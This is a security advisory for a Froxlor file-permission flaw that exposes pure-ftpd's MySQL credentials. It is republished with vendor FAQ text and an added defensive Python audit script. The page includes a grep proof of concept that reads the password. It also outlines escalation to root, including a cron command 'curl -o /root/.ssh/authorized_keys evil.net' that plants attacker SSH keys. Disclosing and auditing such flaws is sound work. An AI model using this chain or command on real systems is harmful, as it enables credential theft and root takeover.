Summary
In Froxlor 2.1.9 and in the HEADs of the main, v2.2 and v2.1 branches, the XML templates in lib/configfiles/ set chmod 644 for /etc/pure-ftpd/db/mysql.conf, although that file contains <SQL_UNPRIVILEGED_PASSWORD>. At least on Debian 12, all parent directories of /etc/pure-ftpd/db/mysql.conf are world readable by default, thus exposing these credentials to all users with access to the system. Only Froxlor instances configured to use pure-ftpd are affected.
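As an added example (not code from this advisory or from the Froxlor project), the following Python script turns the exposure condition stated in the Summary into a check a defender can run: a file is readable by every local account only when the file itself carries the world-read bit and every directory between it and the trusted root carries the world-search (execute) bit. The demo() fixture, its directory modes, the placeholder password line and the 0o640 alternative mode are all constructed for the example; the script does not inspect the real /etc/pure-ftpd/db/mysql.conf and makes no claim about which mode the 2.2.0 fix uses.

```python
"""Audit whether a credential file is readable by every local account.

Added example, not Froxlor's own code. Exposure needs two things at once:
the file has the world-read bit, and every directory on the path has the
world-search bit (the Debian 12 default layout described in the advisory).
"""
import os
import stat
import tempfile


def exposure_report(file_mode, parent_modes):
    """Pure check on permission bits, independent of the filesystem.

    file_mode    -- mode bits of the file, e.g. 0o644
    parent_modes -- mode bits of each directory on the path, root side first
    Returns the two conditions and the combined verdict.
    """
    file_world_readable = bool(file_mode & stat.S_IROTH)
    # A stranger can only reach the file if every directory on the way
    # is searchable by "other"; one 750 directory breaks the chain.
    path_world_searchable = all(m & stat.S_IXOTH for m in parent_modes)
    return {
        "file_world_readable": file_world_readable,
        "path_world_searchable": path_world_searchable,
        "exposed": file_world_readable and path_world_searchable,
    }


def audit_path(path, trust_root="/"):
    """Read the modes from disk and apply exposure_report.

    trust_root is the directory whose own mode is taken as already
    verified; only directories strictly below it are inspected. For a
    real audit this is "/", for the fixture below it is the temp dir.
    """
    path = os.path.abspath(path)
    trust_root = os.path.abspath(trust_root)
    parents = []
    d = os.path.dirname(path)
    # Walk upwards until the trusted root (or the filesystem root) is hit.
    while d != trust_root and d != os.path.dirname(d):
        parents.append(stat.S_IMODE(os.stat(d).st_mode))
        d = os.path.dirname(d)
    parents.reverse()
    return exposure_report(stat.S_IMODE(os.stat(path).st_mode), parents)


def demo():
    """Constructed fixture: the 644 layout from the advisory next to a
    file whose world-read bit was dropped (0o640, an assumed alternative)."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        db_dir = os.path.join(root, "etc", "pure-ftpd", "db")
        os.makedirs(db_dir)
        # 755 mirrors the Debian default for these directories.
        for d in (os.path.join(root, "etc"),
                  os.path.join(root, "etc", "pure-ftpd"),
                  db_dir):
            os.chmod(d, 0o755)
        for name, mode in (("mysql.conf", 0o644),
                           ("mysql.conf.hardened", 0o640)):
            p = os.path.join(db_dir, name)
            with open(p, "w") as fh:
                # Constructed placeholder, not a real credential.
                fh.write("MYSQLPassword placeholder-not-a-real-password\n")
            os.chmod(p, mode)
            results[name] = audit_path(p, trust_root=root)
    return results


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, report)
```

Run it against a real host with audit_path("/etc/pure-ftpd/db/mysql.conf") and the default trust_root of "/"; a True "exposed" verdict means any local account, including a web-application user, can read the file, which is exactly the condition the advisory describes.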
Details
https://github.com/froxlor/Froxlor/blob/2.1.9/lib/configfiles/bookworm.xml#L3075
PoC
As non-privileged user:
nobody@mail:/tmp$ grep MYSQLPassword /etc/pure-ftpd/db/mysql.conf
MYSQLPassword MySecretMySQLPasswordForFroxlor
Impact
Any unprivileged user with "command/code execution" access to the system can trivially obtain the credentials granting access to the Froxlor MySQL database. This holds true even for virtual users without SSH access as long as they are able to upload their own PHP scripts or other CGIs, and works even if the admin has set up a separate php-fpm pool that runs as their own user.
Side note: This access to the database can be leveraged to obtain Froxlor admin privileges, and subsequently root privileges. For example:
- Use the database credentials to extract or change a Froxlor admin's password hash and TOTP seed value.
- Log into Froxlor as that admin.
- Set the Cron-daemon reload command in /admin_settings.php?page=overview&part=crond to something like curl -o /root/.ssh/authorized_keys evil.net.
- Wait a few minutes until the relevant cronjob runs, then log in via SSH.
Please consider using passwordless unix socket authentication. Current versions of MySQL, MariaDB and Percona allow completely removing/omitting database passwords for database connections going through a unix socket. This works even for use cases where the database user has a different name than the system account running the database client:
https://dev.mysql.com/doc/refman/5.7/en/socket-pluggable-authentication.html
A file, directory, or other resource is assigned permissions that allow broader access than intended. Typical impact: unauthorized read, modification, or execution of the resource.
GHSA-34QG-65M4-F23M has a CVSS score of 7.3 (High). The vector requires local access and low privileges, with no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.2.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-34QG-65M4-F23M? GHSA-34QG-65M4-F23M is a high-severity incorrect permission assignment for critical resource vulnerability in froxlor/froxlor (composer), affecting versions <= 2.2.0-rc3. It is fixed in 2.2.0. A file, directory, or other resource is assigned permissions that allow broader access than intended.
- How severe is GHSA-34QG-65M4-F23M? GHSA-34QG-65M4-F23M has a CVSS score of 7.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of froxlor/froxlor are affected by GHSA-34QG-65M4-F23M? froxlor/froxlor (composer) versions <= 2.2.0-rc3 are affected.
- Is there a fix for GHSA-34QG-65M4-F23M? Yes. GHSA-34QG-65M4-F23M is fixed in 2.2.0. Upgrade to this version or later.
- Is GHSA-34QG-65M4-F23M exploitable, and should I be worried? Whether GHSA-34QG-65M4-F23M is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether GHSA-34QG-65M4-F23M is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-34QG-65M4-F23M? Upgrade froxlor/froxlor to 2.2.0 or later.